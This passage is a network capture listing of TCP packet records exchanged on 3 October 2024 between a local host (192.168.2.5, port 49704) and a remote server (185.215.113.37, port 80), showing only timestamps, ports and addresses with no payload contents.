Oct 3, 2024 21:36:14.207639933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.207652092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.207658052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.207668066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.207679033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.207685947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.207695007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.207705975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.207714081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.207736015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.208420038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.208431005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.208440065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.208450079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.208461046 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.208467960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.208478928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.208487988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.208493948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.208503962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.208511114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.208519936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.208532095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.208544016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.208559990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.208569050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.208579063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.208586931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.208596945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.208606005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.208614111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.208623886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.208631039 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.208641052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.208657026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.208673954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.223418951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.223439932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.223462105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.223469973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.223486900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.223504066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.223562956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.223599911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.223690987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.223701954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.223711967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.223731995 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.223742962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290014029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290055990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290066957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290076017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290090084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290111065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290201902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290210962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290222883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290239096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290256023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290304899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290313959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290350914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290368080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290385962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290405989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290422916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290442944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290472984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290482998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290517092 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290533066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290611029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290622950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290648937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290664911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290713072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290721893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290750027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290762901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290824890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290836096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290844917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290854931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290863037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290872097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.290884018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290903091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.290932894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.291105986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291115999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291125059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291151047 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.291172981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.291220903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291230917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291240931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291255951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.291274071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.291425943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291435957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291471004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291476965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291503906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.291543961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.291630983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291640997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291646004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291650057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291655064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291661024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291666031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291671991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291677952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.291773081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.292047977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.292058945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.292068005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.292082071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.292087078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.292095900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.292114973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.292128086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.292280912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.292292118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.292315960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.292326927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.292402029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.292412043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.292422056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.292432070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.292439938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.292448044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.292460918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.292474031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.292484999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.292490005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.292501926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.292507887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.292527914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.292537928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.292562008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.292987108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.292998075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.293009043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.293020964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.293025970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.293040991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.293070078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.293122053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.293133020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.293142080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.293154955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.293160915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.293169022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.293175936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.293184996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.293195963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.293205023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.293210983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.293220997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.293230057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.293236971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.293247938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.293255091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.293263912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.293282032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.293298006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.293982983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.293992996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294003010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294013023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294023037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.294029951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294039965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294048071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.294054985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294064999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294075012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294080973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.294090033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294097900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.294123888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.294636011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294645071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294655085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294665098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294675112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294682026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.294691086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294701099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294709921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.294718027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294728041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.294734001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294744015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294753075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.294759989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294770956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294778109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.294786930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294796944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294806004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.294812918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294821978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.294830084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.294847012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.294872999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.295526028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.295536995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.295547009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.295557976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.295566082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.295574903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.295589924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.295593977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.295603037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.295614958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.295624971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.295634031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.295641899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.295655012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.295669079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.295679092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.295690060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.295730114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.310281992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.310297966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.310307980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.310328960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.310350895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.310498953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.310508013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.310516119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.310534954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.310558081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.310600042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.310765982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.376975060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.376985073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.376993895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377027035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.377058983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.377106905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377116919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377125025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377135038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377147913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.377171040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.377244949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377281904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.377327919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377337933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377372026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.377500057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377509117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377516985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377526045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377533913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377542019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.377568960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.377681017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377712965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.377729893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377737999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377762079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.377775908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.377877951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377887011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377896070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377904892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377917051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377921104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.377928019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.377938032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.377952099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.377975941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.378140926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.378149986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.378158092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.378185034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.378200054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.378206968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.378215075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.378223896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.378232956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.378242970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.378248930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.378268003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.378273964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.378297091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.378525019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.378567934 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.378613949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.378623962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.378632069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.378640890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.378647089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.378654957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.378663063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.378669977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.378680944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.378685951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.378700018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.378742933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.379024029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.379031897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.379040003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.379048109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.379055977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.379061937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.379071951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.379080057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.379086018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.379092932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.379101038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.379117012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.379142046 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.379448891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.379457951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.379466057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.379489899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.379493952 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.379508018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.379513979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.379520893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.379530907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.379539013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.379545927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.379555941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.379565001 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.379570007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.379578114 CEST	49704	80	192.168.2.5	185.215.113.37
